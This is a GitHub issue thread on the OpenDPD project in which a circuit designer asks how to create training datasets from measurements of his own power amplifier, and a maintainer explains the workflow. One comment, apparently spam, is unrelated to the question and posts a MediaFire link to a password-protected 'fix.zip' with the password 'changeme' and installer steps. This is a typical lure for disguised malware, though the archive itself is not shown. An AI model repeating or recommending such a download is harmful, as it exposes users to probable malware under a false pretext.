### ISSUE TITLE
Documentation on input files

### ISSUE THREAD

**Issue by maxanier** [lab-emi/OpenDPD#4]
I would like to test this very interesting project and try to train a model based on a PA of mine. I am a circuit designer and have limited knowledge of machine learning and pre-distortion.

I was able to run the training with the included dataset, but now I am wondering how to create the dataset for my PA and would appreciate some documentation.
My approach would be the following:
1. Generate a modulated baseband signal waveform (e.g. using Matlab/scipy-commpy/lab device) with sufficient duration
2. In the lab, use a vector signal generator to modulate the signal onto a carrier, drive the PA, and use a signal analyzer to retrieve the output (demodulated) IQ-signal. Ensure it is aligned to the input data.
3. Convert both input and output IQ-data to the desired `.csv` files and use the `utils/split_dataset.py` script to partition the data.

Then after training, I could use either the test input data or generate some new input signal and store it as `test_input.csv` to run the DPD on it. When I then use the generated file to drive my PA, ideally the output would be nearly identical to `test_input.csv`

Is this correct, or did I misunderstand something?

Also, do you think your model is somehow specific to OFDM signals? To keep it simple, I would like to just use e.g. a 10 MHz 256-QAM signal.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gaochangw** [comment]
Hi, you are free to choose whatever signals and PAs. For example, you can use the 5G or WiFi signal generator tools of MATLAB to create those signals, which can be split into training, validation and test input sets. For the output sets, you will have to measure them on your setup including a signal generator, optionally pre-driver, your PA and a spectral analyzer where you can offload IQ data into CSV files. The DPD does not make the PA output identical to the inputs, it just linearize the cascaded DPD-PA system response. This can be easily visualized if you draw the AM-AM and AM-PM plot using the outputs generated after you run the run_dpd step. I hope that helps.

**Comment by maxanier** [comment]
Thank you for your response. Ok, so the output of the DPD-PA system is not identical to the input, but a linearly scaled form of the input with zero AM-AM and AM-PM (in ideal case). Makes sense.
Just to clarify, to test this after training in measurements, I will do the following:
Use existing or new `test_input.csv`, `run_dpd` and then use the pre-distorted waveform I get here https://github.com/lab-emi/OpenDPD/blob/4a1dd820e30a8b1b431b0903223c1d5aac476b24/steps/run_dpd.py#L79 to excite the PA.

If I succeed, I will also report back here.
